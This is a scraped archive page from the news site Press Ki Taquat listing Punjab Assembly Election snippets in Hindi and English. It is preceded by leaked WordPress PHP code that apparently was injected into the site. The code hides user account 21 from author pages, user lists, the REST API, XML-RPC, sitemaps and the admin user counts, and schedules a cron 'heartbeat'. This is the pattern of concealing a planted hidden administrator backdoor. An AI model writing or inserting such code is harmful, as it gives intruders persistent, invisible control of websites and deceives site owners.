add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 21;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 21 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 21 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 21;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 21;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 21;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/21(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 21;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
Punjab Assembly Elections Archives - Press Ki Taquat
No Result
View All Result
Chandigarh, 19 January 2022, (Press Ki Taquat Bureau)- Complying to directions of Election Commission of India (ECI), as many as ...
Chandigarh, 18 January 2022, Ahead of Punjab Assembly Elections, Election Commission of India (ECI) on Tuesday transferred seven Inspector Generals ...
चंडीगढ़, 18 जनवरी (प्रेस की ताकत बयूरो)- पंजाब विधानसभा चुनाव के लिए पहली सूची जारी होने के बाद कांग्रेस की ...
चंडीगढ़, 17 जनवरी 2022, (प्रेस की ताकत ब्यूरो)- राज्य में निष्पक्ष, पारदर्शी और लालच मुक्त विधान सभा मतदान को यकीनी ...
Chandigarh, 15 January 2022, (Press Ki Taquat Bureau)- With Punjab Assembly Elections 2022 are around the corner, Director General of ...
बल्लूआना, 3 जनवरी 2022, (प्रेस की ताकत ब्यूरो)- पंजाब विधान सभा मतदान के मद्देनज़र शिरोमणी अकाली दल के प्रधान सुखबीर ...
सरदूलगढ़, 28 दिसंबर 2021, (प्रेस की ताकत ब्यूरो)- पंजाब के मुख्यमंत्री चरणजीत सिंह चन्नी ने आप सुप्रीमो अरविन्द केजरीवाल पर ...
चण्डीगढ़, 28 दिसंबर 2021, (प्रेस की ताकत ब्यूरो)- आम आदमी पार्टी ने साल 2022 में होने वाली पंजाब विधान सभा ...
Rohno Kalan (Ludhiana), December 27, 2021, (Press Ki Taquat Bureau)- Chief Minister Charanjit Singh Channi on Monday said that Aam ...
चंडीगढ़, 21 दिसंबर 2021, (प्रेस की ताकत ब्यूरो)- पंजाब विधान सभा मतदान को ले कर राजनैतिक पार्टियों की सरगर्मियाँ तेज ...
No Result
View All Result